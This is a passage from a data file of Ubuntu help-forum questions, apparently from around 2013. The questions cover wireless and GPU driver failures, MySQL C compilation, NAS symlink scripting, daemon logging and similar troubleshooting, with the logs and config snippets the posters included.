397536	using a nas as a collective dump , with symlinks for whoever uploaded each file	i have a local machine that was sitting around & doing very little , so i decided to turn it into a nas ( network attached storage ) machine , with a 40gb disk for ubuntu ( 13.10 ) , a 160gb disk that 's currently unused , and a 1tb drive that 's hosting movies and tv shows i 've converted from dvd recently . i 'd like to expand its functionality into hosting all the music of the house ( shared between my family members and myself ) , however i do n't want to just disk quota everyone , as i know there 's overlap in our music libraries . idealy , this is what i want to do : [ ] give everyone accounts , and give them ftp write access for '/mnt/1tb/music/_shared ' ( i know how to do this step easily ) . [ ] set up a ( cron ? ) job so that when someone uploads a file to '/mnt/1tb/music/_shared ' , it makes a symbolic link in a folder '/mnt/1tb/music/ { username } ' for each user . how would i get ubuntu to create a symbolic link back to a folder ( with each person 's username , which i 've already created ) when a file is uploaded to the shared ( _shared ) pool ? for reference , i run this machine as a headless nas , so i can not accept gui instructions . that said , i do have ssh access , ftp access ( currently provided by vsftpd ) , and webmin installed on the machine , so that i can do things more easily . i am also using samba on this machine to provide the content ( read-only ) to everyone - i could just as easily allow people to write into a share for the _shared music , if that would be easier to do for symbolic linking . while it would be easier for everyone to upload their music to the server , i am willing to sacrifice this ( with only ftp being possible for uploading ) to gain dynamic symbolic linking of everything uploaded . i basically want a file to be uploaded . if it does n't exist , it 's stored in _shared , and a symlink is created in the folder by the name of whoever uploaded it . if it already exists , and it 's the same filesize , then it should be a prompt ( as usual , to either overwrite or skip ) , and still create a symlink indifferent of the choice the user makes . i have been using ubuntu for about a year now , so i feel i have a decent grasp on it - i 've just no idea where to begin such an idea , and trying to search for a similar thing has n't proved successful yet .
397537	clearspot wireless	why does 13.10 not stay connected to the internet on my clear-spot wireless device ? also when i run a usb cord to charge it it is recognized as a ethernet wired connection . why is this ?
397538	packaging error for amd64	i am trying to package lttoolbox-3.2 for ubuntu , i successfully created ppa and built 32-bit packages . but it always fails for 64 bit failed log : https : //launchpad.net/~aboobackervyd/+archive/apertium/+build/5395410/+files/buildlog_ubuntu-raring-amd64.lttoolbox_3.2-1ubuntu8_failedtobuild.txt.gz ppa link : https : //launchpad.net/~aboobackervyd/+archive/apertium
397543	zeal not working on my ubuntu 13.04	i installed it with given procedure on http : //zealdocs.org/ . it is showing some error . here is the screenshot . i know zeal uses super+alt+space bar . i think there is clash of some similar keyboard shortcuts . so i have changed keyboard shortcut for super+alt+space bar from system setting ( so that zeal can use it ) . but then also it is not working . i googled for issue but could not find solution for it . help me please
397551	script to notify me when something happens on a shared directory	the situation is : i have a shared directories from many other machines where other users work on . i need to be notified whenever a user create , modify or delete a directory or file from his local directory which i share using smb ... it looks like the folder actions in the mac systems.. is there a software that do that ? ! if there is no such application , any help in writing a script for that is appreciated.. thanks in advanced ...
397553	drag-drop between windows	i 'm using ubuntu 12.04 tls . is it possible to drag-and-drop items between windows using alt+tab ? for example , i 'm in a folder and want to drag a file onto google chrome , where i have drive.google.com opened in one of the tabs . so i click on the file , and while i 'm still clicking i try to press alt+tab ( as i 'd do in ms windows ) , but the window choosing bar is n't shown .
397556	how could i successfully log in under a non-existent user account ?	i 'm trying to setup owncloud in a test lab . i somehow managed to create a 'owncloud ' user ( which is fine ) . the account has an empty password ( i 'm not sure how that happened ) , so i 'm trying to set one : for reasons that i do n't understand ( i 'm not a database guru ) , the database is telling me there 's no current user even though i logged in using the 'owncloud ' test account . any ideas how to make mysql behave as expected ? edit : i was wrong about the user 'owncloud ' . it was not created though the owncloud setup ( i think i confused the server 's name ( 'owncloud ' ) with the user ( 'owncloud ' ) because i expected it to be there ) . new question : how in the world could i successfully log in under a non-existent user account ?
397559	i can print but not scan with my epson xp-400 ... what can i do ?	i can print with no problems with my epson xp-400 but not scan - which i need to do often for work - there is no support in linux for epson xp-400 ... is there anything i can do ? thanks !
397562	can not compile mysql code	i have the following code # include < my_global.h > # include < mysql.h > int main ( int argc , char **argv ) { printf ( `` mysql client version : % s\n '' , mysql_get_client_info ( ) ) ; exit ( 0 ) ; } when i try to compile it using gcc mysqldb.c -o mysql -i/usr/include/mysql -lmysqlclient i get an error saying fatal error mysql.h : no such file or directory . how can i successfully compile and run the code
397564	no wifi connection rtl8723be on ubuntu 13.04	i tried with this and it works relatively well with few issues . yesterday i tried to remove/reinstall the driver and after that i ca n't enable wifi on my lenovo thinkpad e540 . uname -a linux metodiew 3.8.0-34-generic # 49-ubuntu smp tue nov 12 18:00:10 utc 2013 x86_64 x86_64 x86_64 gnu/linux lspci -nn 04:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 10 ) 05:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. device [ 10ec : b723 ] nm-tool networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8168 state : connected default : yes hw address : 28 : d2:44:2e : c6 : e6 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.0.101 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 192.168.0.1 if i try to download drivers from github , then make clean , make , sudo make isntall , sudo modprobe rtl8723be , i get an error : error : could not insert 'rtl8723be ' : invalid argument as @ chili555 asked , here is what i get from : cat /var/log/syslog | grep -e rtl -e etwork | tail -n25 dec 30 10:35:59 metodiew kernel : [ 1658.485960 ] rtl8723be : unknown symbol ieee80211_find_sta ( err -22 ) dec 30 10:35:59 metodiew kernel : [ 1658.485984 ] rtl8723be : disagrees about version of symbol rtl_pci_disconnect dec 30 10:35:59 metodiew kernel : [ 1658.485987 ] rtl8723be : unknown symbol rtl_pci_disconnect ( err -22 ) dec 30 10:35:59 metodiew kernel : [ 1658.486001 ] rtl8723be : disagrees about version of symbol rtl_pci_suspend dec 30 10:35:59 metodiew kernel : [ 1658.486005 ] rtl8723be : unknown symbol rtl_pci_suspend ( err -22 ) dec 30 10:35:59 metodiew kernel : [ 1658.486021 ] rtl8723be : disagrees about version of symbol rtl_signal_scale_mapping dec 30 10:35:59 metodiew kernel : [ 1658.486025 ] rtl8723be : unknown symbol rtl_signal_scale_mapping ( err -22 ) dec 30 10:35:59 metodiew kernel : [ 1658.486055 ] rtl8723be : disagrees about version of symbol rtl_ps_enable_nic dec 30 10:35:59 metodiew kernel : [ 1658.486058 ] rtl8723be : unknown symbol rtl_ps_enable_nic ( err -22 ) dec 30 10:35:59 metodiew kernel : [ 1658.486072 ] rtl8723be : disagrees about version of symbol rtl_pci_resume dec 30 10:35:59 metodiew kernel : [ 1658.486075 ] rtl8723be : unknown symbol rtl_pci_resume ( err -22 ) dec 30 10:35:59 metodiew kernel : [ 1658.486106 ] rtl8723be : disagrees about version of symbol rtl_cam_add_one_entry dec 30 10:35:59 metodiew kernel : [ 1658.486110 ] rtl8723be : unknown symbol rtl_cam_add_one_entry ( err -22 ) dec 30 10:35:59 metodiew kernel : [ 1658.486137 ] rtl8723be : disagrees about version of symbol rtl_efuse_shadow_map_update dec 30 10:35:59 metodiew kernel : [ 1658.486141 ] rtl8723be : unknown symbol rtl_efuse_shadow_map_update ( err -22 ) dec 30 10:35:59 metodiew kernel : [ 1658.486154 ] rtl8723be : disagrees about version of symbol rtl_get_tcb_desc dec 30 10:35:59 metodiew kernel : [ 1658.486157 ] rtl8723be : unknown symbol rtl_get_tcb_desc ( err -22 ) dec 30 10:35:59 metodiew kernel : [ 1658.486182 ] rtl8723be : disagrees about version of symbol rtl_ps_disable_nic dec 30 10:35:59 metodiew kernel : [ 1658.486185 ] rtl8723be : unknown symbol rtl_ps_disable_nic ( err -22 ) dec 30 10:35:59 metodiew kernel : [ 1658.486204 ] rtl8723be : disagrees about version of symbol rtl_cam_get_free_entry dec 30 10:35:59 metodiew kernel : [ 1658.486208 ] rtl8723be : unknown symbol rtl_cam_get_free_entry ( err -22 ) dec 30 10:35:59 metodiew kernel : [ 1658.486220 ] rtl8723be : disagrees about version of symbol rtl_pci_probe dec 30 10:35:59 metodiew kernel : [ 1658.486224 ] rtl8723be : unknown symbol rtl_pci_probe ( err -22 ) dec 30 10:35:59 metodiew kernel : [ 1658.486236 ] rtl8723be : disagrees about version of symbol rtl_cam_delete_one_entry dec 30 10:35:59 metodiew kernel : [ 1658.486240 ] rtl8723be : unknown symbol rtl_cam_delete_one_entry ( err -22 ) now i have working wired connection , but do n't have option to enable/disable wireless connection . also as i said on other question from time to time i lost connection for some reason and after that i ca n't reconnect to the network . i have to reboot and after that i have wifi . i can confirm that chili555 method works for me . but i have strange problem - if i 'm > connected and if i lost connection for some reasons , after that i ca n't connect to > any other ( or same ) wifi . is anybody else having the same problem ? lenovo thinkpad > e540 . thanks in advance : ) update i select earlier kernel version : linux metodiew 3.8.0-19-generic # 30-ubuntu smp wed may 1 16:35:23 utc 2013 x86_64 x86_64 x86_64 gnu/linux and now i have wifi connection . will update question if i still have problems with lost connection from time to time .
397568	amd radeon hd 7640g/7670m dual gpu not working in ubuntu 13.04	i 'm facing a problem while installing an ati driver through additional driver . i was trying to install the same in ubuntu 13.04 . the config of my laptop is amd radeon hd 7640g/7670m dual gpu ( 1 gb ddr3 dedicated ) i 'm facing a tough time ahead my project due to this issue . i have tried almost everything available in net . tried following the instruction given in unofficial amd site ... but of no avail . now though i have ubuntu 13.04 installed perfecly on my lappy ... . the charge gets drained out in matter of just 15 minutes . also while booting ubuntu i get following error error : can not find a backlight controller before i enter my password ... please help..
397571	problem with admin account	i have a little problem with mi administrator account in ubuntu 13.10 , just upgraded from 12.10 , turns out that mi account seems to be stuck ( sort of ) , in -system settings-user accounts- just shows the info , even says `` my account '' instead of `` alejandro '' ( which is my admin account ) , i clicked the unlock button , set the pass but still gives me just the info , i do n't know if its related , but also can not use nautilus , always gives me an error . i want to set the auto login but can select anything , i really appreciate any help . thanks in advance .
397573	i need to set atheros wireless card as an ap in ubuntu 13.10 linux !	i used to set my atheros wireless card as an ap in ubuntu 12.04 with hostapd package and success . now i need to set my atheros wireless card as an ap in ubuntu 13.10 with hostapd package . with code : sudo hostapd -b /etc/hostapd/hostapd.conf i found that error : configuration file : /etc/hostapd/hostapd.conf nl80211 : failed to set interface wlan0 into ap mode nl80211 driver initialization failed . is that ubuntu 13.10 linux does n't support for the nl80211 driver , or could i use other way to resolve this problem ? thanks for your suggestion !
397575	how to change amd catalyst control center 's language ?	my lubuntu installation presented a very strange feature this time : when i installed amd proprietary drivers for my gpu i found out that my catalyst control center is in german , even though the rest of the system is in english . the only thing i can imagine to have caused this is the fact that i am in germany right now , though i highly doubt that amd 's software language is solely determined by the physical location of the pc in which it is installed . maybe it is because of the repositories , but i do n't really know . anyway , does somebody know if i can change the language of amd catalyst control center without uninstalling the whole thing ? thanks in advance .
397577	problem with installing nvidia-173 driver ubuntu	my graphics card is a geforce fx5200 . after installing the nvidia drivers , the resolution of my pc monitor is limited to 640x480 and 320x240- i installed the packages nvidia-173 , nvidia-173-updates and nvidia-96 on the 3 different ubuntu versions ( 10.10 , 12.04 , 13.04 ) . is there any solution ? ? ?
397578	ubuntu sometimes booting on an older version	brace yourselves my friends , weird stuff is incoming . my laptop had only one hdd back in the time . my two opensuses , my windows and my ubuntu were leaving peacefully all together , ruled by the mighty grub . then the ssd attacked , helped with his faithful caddy . the ubuntu part was moved into the ssd , the ( insanely good ) boot-repair utility was launched and everything was fine . and this is when things started to get weird . sometimes , when i boot , i choose ubuntu , but instead of booting normally ... it boots on an older version of my ubuntu . i 'm not saying it 's switching from 13.10 to 12.4 , i 'm saying it literally goes back in time , with my old wallpaper , missing my new packages , my files and so on . i have to reboot once or twice and then , magically , i get my actual ubuntu . edit : by the way , i could n't find any pattern in this behavior . sometimes it does it after a long time without rebooting , sometimes it does n't , ac plugged in/off , after going on another os or not ... i tried running again boot-repair , i checked with grub customizers if the entry `` ubuntu '' was pointing to the right file system , i checked for older ubuntu versions on both drives , i 'm kinda clueless right now , thinking of calling a shaman to perform some voodoo-stuff .
397585	how to send mail from the command line using tor ?	i wanted to send email from my own mail server using a ip from tor network . so , i installed the sendmail and tor in my ubuntu server . but somehow i am not able to make sendmail to use tor network . the command : tsocks sendmail -t someone @ google.com is sending email from my original ip than tor ip . i tried to google the problem and it seems that sendmail dont support socks proxy . thus , is there a way to send mail from any ubuntu mail server over tor using command line ? if yes which and how ?
397587	installation from dvd of 13.10 stops with kernel panic	i had to re-install ubuntu from scratch . it has 13.04 ( i had a heck of a time getting 13.04 installed ) but wo n't run all the programs i want , so i decided to upgrade to 13.10 . troubles ... not upgrade , but install . i downloaded the 64 bit version for my desktop . burned it , and all was ok . i then booted from the dvd . i got the usual bios report of drives and memory , then i got this : could not open `` \efi\boot\fallback.ef1 '' : 14 error : variable 'root ' is not set i got the poor quality graphic with the two pics at the bottom of a keyboard and something else . then i saw the text options for proceeding : try ubuntu without installing install ubuntu oem install check disks for defects i chose install ubuntu , then i got an error : error : failure reading sector 0x6c000 from 'fd0' error : you need to load the kernel first , press any key to continue ... d to grub or boot ? , and got dumped into this : busybox v1.20.2 ( ubuntu 1:1.20.0-8.1ubuntu1 ) built in shell ( ash ) enter help for list of commands ( initramfs ) _ if i type exit , i see : /init line 352 : ca n't open /root/dev/console : no such file 17.372670 kernel panic - not syncing : attempted to kill init ! 17.372670 drm_kms_helper : panic occurred , switching back to text console which does not appear , frozen , nothing changes what am i to do ?
397588	installing ubuntu on hitech amaze s250 android phone	im using a hitech amaze s250 android phone and i want to install ubuntu on it . is it possible considering the hardware ? this is a description of the hardware as per their website : http : //www.hitech-mobiles.com/s250.html the processor is armv7 i dont have extensive knowledge on the topic and need help : ) any help will be greatly appreciated : )
397589	enable logging to service	i 'm trying to figure out how to enable logging in transission . i know i can run the daemon in the front : transmission-daemon -f -- logfile /your/path/to/transmission.log but this is not what i want . i want to enable this option ( logfile ) in the service instance . so far i 've discovered that running sudo service transmission-daemon executes the file located in /etc/init.d/transmission-daemon . this file ( as shown below ) does n't really make me any wiser . so far i understand the following : -- exec $ daemon -- $ options executes the effective daemon . this file ( as seen in the variable on top of the script ) is located in /usr/bin/ $ name . $ name is transmission-daemon . this is an executable located in there . so i think you can pass it along some options ( ie -- logfile ) . so i added an instantiation of the options variable but this does n't seem to write anything . i tried the options= '' -- logfile /smb/torrents/transmission.log '' line so that it might append them to the execution but it throws an error . another thing i tried was using the option without any quotes . options= -e /smb/torrents/transmission.log this throws me the same error : : ~ $ sudo service transmission-daemon restart /etc/init.d/transmission-daemon : 15 : /etc/init.d/transmission-daemon : -e /smb/torrents/transmission.log : not found doing the above without - does n't show me any errors , but does n't write to the log file either.. adding the -- logfile option after the execution -- exec $ daemon -- logfile /path/file -- $ options yields another error as well : * restarting bittorrent daemon transmission-daemon start-stop-daemon : unrecognized option ' -- logfile' the logfile has sufficient permissions , though : -rwxrwxrwx 1 debian-transmission debian-transmission 0 dec 30 11:14 transmission.log* so my question is , how do do this exactly ? # ! /bin/sh -e # # # begin init info # provides : transmission-daemon # required-start : $ local_fs $ remote_fs $ network # required-stop : $ local_fs $ remote_fs $ network # default-start : 2 3 4 5 # default-stop : 0 1 6 # short-description : start or stop the transmission-daemon . # # # end init info name=transmission-daemon daemon=/usr/bin/ $ name user=debian-transmission stop_timeout=30 options= '' -- logfile /smb/torrents/transmission.log '' export path= '' $ { path : + $ path : } /sbin '' [ -x $ daemon ] || exit 0 [ -e /etc/default/ $ name ] & & . /etc/default/ $ name . /lib/lsb/init-functions start_daemon ( ) { if [ $ enable_daemon ! = 1 ] ; then log_progress_msg `` ( disabled , see /etc/default/ $ { name } ) '' else start-stop-daemon -- start \ -- chuid $ user \ $ start_stop_options \ -- exec $ daemon -- $ options fi } case `` $ 1 '' in start ) log_daemon_msg `` starting bittorrent daemon '' `` $ name '' start_daemon log_end_msg 0 ; ; stop ) log_daemon_msg `` stopping bittorrent daemon '' `` $ name '' start-stop-daemon -- stop -- quiet \ -- exec $ daemon -- retry $ stop_timeout \ -- oknodo log_end_msg 0 ; ; reload ) log_daemon_msg `` reloading bittorrent daemon '' `` $ name '' start-stop-daemon -- stop -- quiet \ -- exec $ daemon \ -- oknodo -- signal 1 log_end_msg 0 ; ; restart|force-reload ) log_daemon_msg `` restarting bittorrent daemon '' `` $ name '' start-stop-daemon -- stop -- quiet \ -- exec $ daemon -- retry $ stop_timeout \ -- oknodo start_daemon log_end_msg 0 ; ; status ) status_of_proc `` $ daemon '' `` $ name '' & & exit 0 || exit $ ? ; ; * ) echo `` usage : /etc/init.d/ $ name { start|stop|reload|force-reload|restart|status } '' exit 2 ; ; esac exit 0
397590	how to lock a config file under /etc	after every upgrade i have to change the line # 'libusb ' device nodes subsystem== '' usb '' , env { devtype } == '' usb_device '' , mode= '' 0664 '' to # 'libusb ' device nodes subsystem== '' usb '' , env { devtype } == '' usb_device '' , mode= '' 0666 '' in /lib/udev/rules.d/50-udev-default.rules to make the scanner work for non root users . is there any way to prevent ubuntu to change this file on upgrades ?
397591	i just formatted my external hard drive , so why the is used space huge ?	i used gparted to format my 1tb external hdd to ext4 . i am new to linux and all but after formatting almost 15gib of space is used . is this normal ? is this how large the ext4 is ? i am going to use this to store a lot of videos and the more videos i can fit the better .
397592	opengl issues running xbmc on arm device	i am running saucy server on my mk802+ android mini pc , have managed to download and build xbmc source from git , but i can not get the opengl to run from the mali400 gpu in the device . device info : armhf arch ( cortex a8 ) when i execute xbmc on x , i get the following error : root @ mk802-xbmc-server : / # libgl_debug=verbose xbmc gtk-message : failed to load module `` canberra-gtk-module '' libgl : opendriver : trying /usr/lib/arm-linux-gnueabihf/dri/tls/i965_dri.so libgl : opendriver : trying /usr/lib/arm-linux-gnueabihf/dri/i965_dri.so libgl error : dlopen /usr/lib/arm-linux-gnueabihf/dri/i965_dri.so failed ( /usr/lib/arm-linux-gnueabihf/dri/i965_dri.so : can not open shared object file : no such file or directory ) libgl : opendriver : trying $ { origin } /dri/tls/i965_dri.so libgl : opendriver : trying $ { origin } /dri/i965_dri.so libgl error : dlopen $ { origin } /dri/i965_dri.so failed ( $ { origin } /dri/i965_dri.so : can not open shared object file : no such file or directory ) libgl : opendriver : trying /usr/lib/dri/tls/i965_dri.so libgl : opendriver : trying /usr/lib/dri/i965_dri.so libgl error : dlopen /usr/lib/dri/i965_dri.so failed ( /usr/lib/dri/i965_dri.so : can not open shared object file : no such file or directory ) libgl error : unable to load driver : i965_dri.so libgl error : driver pointer missing libgl error : failed to load driver : i965 libgl : opendriver : trying /usr/lib/arm-linux-gnueabihf/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/arm-linux-gnueabihf/dri/swrast_dri.so while i do have the mali400 binary drivers installed , as per binary drivers , i suspect there is a config file i am missing ... can anybody assist me in getting libgl to stop looking for i965_dri.so and use the mali400 instead ?
397594	what 's the mounted path for sound device ?	as the title ? in red hat sound device is mounted at /dev/dsp . how about ubuntu ? regards , hua jie
397597	use the old , xp style alt+tab in lxde	how do i make the alt+tab in lxde to show icons only , similar to windows xp 's alt+tab dialog ? this is how it looks now : and this is the old xp style dialog :
397599	double timezone . how to delete one ?	after upgrading from ubuntu 13.04 to 13.10 , my clock was always one hour fast . i issued the command sudo dpkg-reconfigure tzdata current default time zone : 'europe/brussels' local time is now : mon dec 30 11:52:06 cet 2013 . universal time is now : mon dec 30 10:52:06 utc 2013 . the time is correct now , but i notice a double time-zone in the clock-applet . how can i remove the other one ? note that cat /etc/timezone returns europe/brussels . the copenhagen-entry is n't specified . however if one clicks on the clock-applet on the brussels-value , the brussels-value disappears and only the copenhagen-entry is left . now this entry appears in /etc/timezone .
397601	glib error when trying to open firefox and thunderbird	i read the other similar problems but either there are no answers or the problem is not the same as mine . suddenly , without any reason , my firefox and thunderbird just stopped working . i click on the icon , it looks like it is starting and then nothing happens . i am very fresh user of linux and because i do n't know the pro commands i just tried the following : i have opened the terminal and just typed firefox . what i get as a result is the following : ( process:11768 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed ( firefox:11768 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :sm-connect after class was initialised ( firefox:11768 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :show-crash-dialog after class was initialised ( firefox:11768 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :display after class was initialised ( firefox:11768 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :default-icon after class was initialised could not create gnome accelerators directory `/home/tonkata/.gnome2/accels ' : permission denied then , after reading some posts and without being sure what to expect i types in the terminal locate glib.h . what i get back is this : /home/tonkata/ubuntu one/usr/src/linux-headers-3.11.0-12-generic/include/config/blk/dev/bsglib.h /usr/src/linux-headers-3.11.0-12-generic/include/config/blk/dev/bsglib.h /usr/src/linux-headers-3.11.0-13-generic/include/config/blk/dev/bsglib.h /usr/src/linux-headers-3.11.0-14-generic/include/config/blk/dev/bsglib.h /usr/src/linux-headers-3.11.0-15-generic/include/config/blk/dev/bsglib.h so , what is glib ? and why i have some permissions denied ? i am really new and just do n't know what to do more . please , give me your thoughts in a `` for dummies '' style . thank you , guys !
397602	how do i copy top x files from a directory to another using terminal command ?	i have a directory more than 1200+ files . how do i copy the top 1000 lines of that directory to another directory ?
397603	startup with same applications running as on shutdown ?	help ! i 'm running audacious on ubuntu as my digital music player only . all i want is for ubuntu to startup with a file window and audacious running as when i shut down the computer last . how do i do this ? it used to be possible on an earlier installation . now i upgraded to 13.10 and everything is difficult . i ca n't even find preference settings for shutdown the command and audacious does n't save my settings for new skin , appearance , etc . what happenend ? ?
397604	installing requirements	i have a pc wit 3.2ghz dual core processor and 1.2gb of ram . currently i have ubuntu 10.04 installed in my pc ( wubi ) . i have an iso image of ubuntu 12.04 versio , in the iso image theres a wubi.exe file but while executing it shows an error in the temporary file folder . so is wubi not available for this version ?
397606	lxde : gracefully logout instead of killing all running applications	on windows , when you logout , each application receives the equivalent of alt+f4 , so if you have an unsaved document in word , it will show a message asking you to save it . in lxde , instead , each program just closes , even though i have unsaved documents . it seems each program receives a sigterm instead of an alt+f4 equivalent . is there a way to change that behavior ?
397608	unable to repair low graphics mode and unable to remember password	after three weeks of trying in install ubuntu on asusf550dp laptop with radeon hd 8670m graphics i finally managed to work around the black screen and install ubuntu on the laptop . the problem i have now is that the system is running in low graphics mode . reading about the problem seems like i need to update the drivers via alt + cont +f1 to get to terminal the issue now is that i can not remember the login + password to log in to be able to run the commands in terminal ... ( i know it sounds stupid but i ca n't remember the suggest log in which i agreed for and i have tried every possible combination i can think of with no luck ) is there any way around this ? any otherway to update drivers ? is there anyway of finding out at least the user id for the log in ? i 'm new to ubuntu ... please save me from windows 8 !
397610	svn post- and pre- commit hooks do n't work when subversion gets commited	i have no idea how to fix it . i wrote a simple bash script which writes current date and time to the file , and put it to the post-commit and pre-commit hook . when i run this locally typing eg . ./pre-commit ./post-commit it works but when i commit to my svn , nothing happens . maybe i missed something in configuration ? please , help me ... here 's the script just to let you know what it is about : filename= '' datefile '' echo `` writing file $ { filename } ... '' echo `` commited ... '' > $ { filename } date | cut -d '' , '' -f2 > > $ { filename } date | cut -d '' `` -f5 > > $ { filename } echo `` done ! '' thanks for any help . ps . this is not a problem with perms , i already gave right ones to both , the scripts files and datefile .
397613	can filemaker pro work on ubuntu ?	filemaker pro 12 ( or any other version ) work on ubuntu ? or will i have to run a dual boot system in order to run these windows programs ?
397615	keybinding for mousewheel while mousepointer is over background	in ubuntu 12.04 i would like to bind mousewheel-up/down in unity to a command , but only when the mousepointer is over the background . obviously if the pointer is over a window , it has focus . is there a way to do this ?
397616	thunar spacing between folder rows	what i would like to know , if there 's anyway to disable thunar in xubuntu 13.10 from displaying the full name of folders , as with long names it increases the spacing between lines of folders , sometimes for a third of the screen space . is it possible to have something like nautilus has , fixed spacing between rows , and full name of folder showing upon hovering over the folder ? i offer you a screenshot of odd spacing and big gaps between rows of folders .
397617	mysql database created using c code does not appear in database	i created a database by compiling and running the code below . however on opening the mysql , the database does not appear . any idea why this is so ? # include < my_global.h > # include < mysql.h > int main ( int argc , char **argv ) { mysql *con = mysql_init ( null ) ; if ( con == null ) { fprintf ( stderr , `` % s\n '' , mysql_error ( con ) ) ; exit ( 1 ) ; } if ( mysql_real_connect ( con , `` localhost '' , `` root '' , `` root_pswd '' , null , 0 , null , 0 ) == null ) { fprintf ( stderr , `` % s\n '' , mysql_error ( con ) ) ; mysql_close ( con ) ; exit ( 1 ) ; } if ( mysql_query ( con , `` create database testdb '' ) ) { fprintf ( stderr , `` % s\n '' , mysql_error ( con ) ) ; mysql_close ( con ) ; exit ( 1 ) ; } mysql_close ( con ) ; exit ( 0 ) ; }
397619	need to update to latest supported kernel version in ubuntu 12.04	right now i am using ubuntu 12.04 lts with kernel as 3.8.0-35-generic , while i use this kernel i face a lot of problems i ) graphics of my lcd screen connected to my laptop via vga cable appears to be too bad . ii ) mozilla firefox is too slow and system get totally hanged.i had to restart it again by power button.. here is the screen-shot.every icon is so big in mirror display.when i search a lot on firefox getting hanged , i found that it ; s a bug being and possible solution is to upgrade the kernel . well while i upgrade kernel , display was too good and really i loved that . but suddenly i found that none of the peripheral was working else than vga port.i upgraded my ubuntu to 3.8.5-030805-generic.usb , rj45 ( for ethernet ) , wifi , none was working.i also posted a question on ubuntu.here is the link . but i got no useful reply that would have solve my problem . and that 's why i have to turn back to my older version.i do n't want to re-install ubuntu 13.04 with latest kernel as there are lot of useful packages that i had installed in my system.so if there any option so that i can make my present system with ubuntu 12.04 fast with same kernel 3.8.0-35-generic or if i can upgrade to 13.04 or 13.10 ( i know i am just asking question assuming it would be easy , but it is not ) . need help , i have been using ubuntu from last 2 years and i love working on it but i had never been to kernel upgrade earlier . edit : i had found a long way to upgrade to 12.10 and then to 13.04 from ubuntu upgrade notes.i must have searched this earlier , but my rest of questions are still open
397620	unable to connect to internet after wakeup from hibernate ?	it says networking is disabled . i have tried checking that box ( which stays checked ) ; but that does nothing . even tried : sudo ifconfig wlan0 up ; which also did nothing . i 'm running ubuntu 13.10 x64 .
397621	my d-link easy wireless adapter n150 is not longer recognised by my ubuntu	i use ubuntu 13.10 , and iâ´ve bought recently a d-link n150 . when i installed ubuntu for first time , the device worked fine , and my computer showed me all the wifi networks avaliable arround . however , when i unplugged my adaptor and i plugged in again , my computer did not be able to find any adaptor or to find any network . my device was not working anymore . allways i unplug my adaptor , i have to install ubuntu again . i would want to know what could i do so as to make my device recognised allways by linux . thanks .
397625	ca n't install ubuntu on vmware	for some reasons i have to use windows as my os . but i need using linux for other things . so i decided to use ubuntu on vmware . but every time i want to install it with easy install , it stucks in the middle of it ( in retrieving files step ) . what can i do about it ? p.s : i mount the iso setup file of ubuntu 12.04 in a virtual drive .
397626	lubuntu 13.10 no wireless internet connectivity	lubuntu 13.10 no wireless internet connectivity i am new to lubuntu ( and anything like it ) . i downloaded 13.10 to replace windows me . i chose to download it and save it onto a memory stick through a windows laptop . on windows me computer i downloaded lubuntu through to a usb stick , then used the option of trying it before making the decision to scrub me from the system . it seemed to download well and i made the decision early on to make use of the option to scrub me and run solo on lubuntu.it seems to fire up well and quickly . clicking on anything provides a quick response and so on . however . the visible non functioning parts ( in my inexperienced opinion ) are : 1 - you have to hover over files and apps to be presented with the associated icon . not all files and apps are icon less but 90 % are . 2 - it will not offer my wireless hub as an option for connecting wirelessly . i subscribe to sky internet as part of my tv package . the hub is the newer one provided by sky - model sr101 . my two laptops work well with this hub wirelessly . 3 ) - the dvd drive does not perform well in two areas . firstly the button to open and close the drawer does not always work since uploading lubuntu . when inserting a dvd , it offers the actual folder of the chapter which if double clicked does play . it does not join the chapters together to provide what i would call a normal dvd/vcd user experience . again it the icon appearing with the name of the chapter is intermittent and most do not have the icon with the name . of all the points above my must have is not being able to connect to my wireless hub . on the subject computer wireless connection is attained through a dongle plugged into a usb port . whilst the dongle ( which is new ) only came with a windows driver i think it works ok in lubuntu as it offers next doors wireless connection as the only choice for connecting wirelessly ( my modern laptop confirms this option as a nearby wireless connection offering ) . i have not tried connecting to my sky internet using a direct line feed as iâm not sure if that proves anything in that i would not want to use it in that way in any case . however if it is advised that i do this i will . any help would be much appreciated . the other points are should haves . i would be grateful for any help you can give ? should i try and reinstall lubuntu in a different way for example . here is a system report processor amd athlon ( tm ) processor memory 248mb ( 145mb used ) operating system ubuntu 13.10 lg cd-rw ced-8120b kernel linux 3.11.0-12-generic ( i686 ) desktop environment lxde ( lubuntu ) misc uptime 44 minutes load average 0.19 , 0.18 , 0.21 processor name amd athlon ( tm ) processor family , model , stepping 6 , 4 , 4 ( amd athlon ( thunderbird ) ) frequency 1302.23mhz memory total memory 248244 kb free memory 13952 kb buffers 35688 kb cached 89568 kb cached swap 0 kb active 84380 kb host bridge via technologies , inc. vt8363/8365 [ kt133/km133 ] ( rev 81 ) pci bridge via technologies , inc. vt8363/8365 [ kt133/km133 agp ] ( prog-if 00 [ normal decode ] ) firewire ( ieee 1394 ) texas instruments tsb12lv26 ieee-1394 controller ( link ) ( prog-if 10 [ ohci ] ) communication controller conexant systems , inc. hsf 56k hsfi modem ( rev 01 ) ethernet controller accton technology corporation smc2-1211tx ( rev 10 ) isa bridge via technologies , inc. vt82c686 [ apollo super south ] ( rev 22 ) ide interface via technologies , inc. vt82c586a/b/vt82c686/a/b/vt823x/a/c pipc bus master ide ( rev 10 ) ( prog-if 8a [ master secp prip ] ) usb controller via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev 10 ) ( prog-if 00 [ uhci ] ) usb controller via technologies , inc. vt82xxxxx uhci usb 1.1 controller ( rev 10 ) ( prog-if 00 [ uhci ] ) bridge via technologies , inc. vt82c686 [ apollo super acpi ] ( rev 30 ) multimedia audio controller via technologies , inc. vt82c686 ac97 audio controller ( rev 20 ) vga compatible 